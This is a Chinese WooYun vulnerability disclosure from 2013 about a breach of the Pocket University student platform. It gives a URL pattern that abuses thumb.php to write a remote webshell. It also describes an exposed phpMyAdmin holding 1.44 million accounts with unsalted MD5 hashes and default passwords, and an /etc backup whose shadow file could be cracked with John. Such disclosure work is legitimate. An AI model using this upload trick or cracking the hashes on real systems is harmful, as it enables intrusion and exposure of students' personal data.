当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044732

漏洞标题:口袋校园遭入侵(大量用户信息泄露)

相关厂商:口袋校园

漏洞作者: 0xCC

提交时间:2013-12-03 13:27

修复时间:2014-01-17 13:28

公开时间:2014-01-17 13:28

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Pocket University——江苏省大学生成长服务平台是由团江苏省委主导开发,运用移动互联技术,集成省内大学教育资源,服务于大学生第二课堂和日常生活的综合成长服务平台。通过信息交互、资源共享,实现学生成长服务的网络内容和产品供应,实现对大学生群体的吸引凝聚和有效覆盖,进而实现隐形引导和有效影响。PU作为团省委新媒体建设重要手段之一,将在今后高校共青团工作中发挥重要作用。
这样的网站被脱裤后果如何?包括南京大学在内的众多江苏省名校,大量帐号(含测试帐号)密码哈希和真实姓名、学校、学号和手机号就这样被人拿到了。既然要大学生用真实资料参与积分活动,为何不不在安全上多花点功夫呢?

详细说明:

在群里看到有人炫耀脱了一个库,涉及144万帐号密码。
洞主没有透露上传webShell的具体思路,但是根据其客户端APK的逆向分析,很有可能是利用了如下接口将WEBSHELL写入网站目录。
http://www.xyhui.com/thumb.php?url=远程WEBSHELL文件地址?w=10&h=10
获取shell之后又发现一个对外网开放访问的phpMyAdmin

xxx.jpg


高潮来了,里面有144万多个帐号密码,密码仅使用MD5进行哈希处理,没有加盐。
数据字段包括真实姓名,邮箱,手机号,学号,所在高校(目前有包括南京大学在内的大批江苏省高校需要开通这项服务)和密码哈希。一旦外流后果不堪设想!
需要说明的是,这个系统不需要注册就已经有了真实姓名等资料,只是需要激活帐号开通。没有激活帐号的密码默认为111111。在排除使用“111111”为密码的用户之后,有18万个帐号设置了别的密码(注册激活的用户)。
貌似公司方面已经得到入侵消息,PHPMYADMIN目前已被删除,而且thumb.php的漏洞似乎已经被修补
等等,还有呢。
正在测试提权的时候,突然发现管理员居然把/etc/目录做了一个压缩存档备份etc.tar!shadow文件也有,要是有给力的John字典就可以直接跑出root密码了。该网站的服务器对外也开放了SSH。真是……

漏洞证明:

xxx.png


/etc/shadow也有哦

-1.png

修复方案:

貌似已经有了修补了,数据库暂时没有外流的迹象。
如果没猜错后台使用了ThinkSNS做二次开发,请关注最近ThinkSNS的安全更新(听说还有GETSHELL漏洞)
看着补吧。求别跨省

版权声明:转载请注明来源 0xCC@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论